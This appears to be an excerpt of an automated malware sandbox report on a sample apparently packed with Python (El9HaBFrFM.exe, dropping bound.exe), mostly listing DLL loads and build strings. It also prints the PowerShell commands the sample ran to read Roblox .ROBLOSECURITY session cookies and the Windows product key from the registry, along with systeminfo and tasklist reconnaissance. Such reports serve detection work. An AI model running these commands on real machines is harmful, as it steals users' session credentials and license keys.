              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\bound.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
              Source: El9HaBFrFM.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: El9HaBFrFM.exeStatic file information: File size 8278102 > 1048576
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: El9HaBFrFM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: El9HaBFrFM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: El9HaBFrFM.exe, 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdbhP, source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: o.pdbE source: powershell.exe, 0000002E.00000002.2106834306.0000026CD013D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.pdb source: powershell.exe, 0000002E.00000002.1947586190.0000026CB8305000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAF32000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000002.2261813551.00007FFE13344000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2256002845.00007FFDFAFCA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261083464.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261488219.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259608599.00007FFE11501000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: El9HaBFrFM.exe
              Source: Binary string: E:\trksyln\Coding\trksyln.net\repos\TGMacro\obj\Debug\TGMacro.pdb source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmp, El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp, bound.exe, 00000012.00000000.1715370001.0000026C525E2000.00000002.00000001.01000000.00000016.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260891660.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: El9HaBFrFM.exe, 00000001.00000002.2261272243.00007FFE1322B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260707482.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260219620.00007FFE11561000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: El9HaBFrFM.exe, 00000001.00000002.2260486128.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: El9HaBFrFM.exe, 00000001.00000002.2258031629.00007FFDFB648000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2259888394.00007FFE1152E000.00000040.00000001.01000000.0000000E.sdmp
              Source: El9HaBFrFM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: El9HaBFrFM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: El9HaBFrFM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: El9HaBFrFM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: El9HaBFrFM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
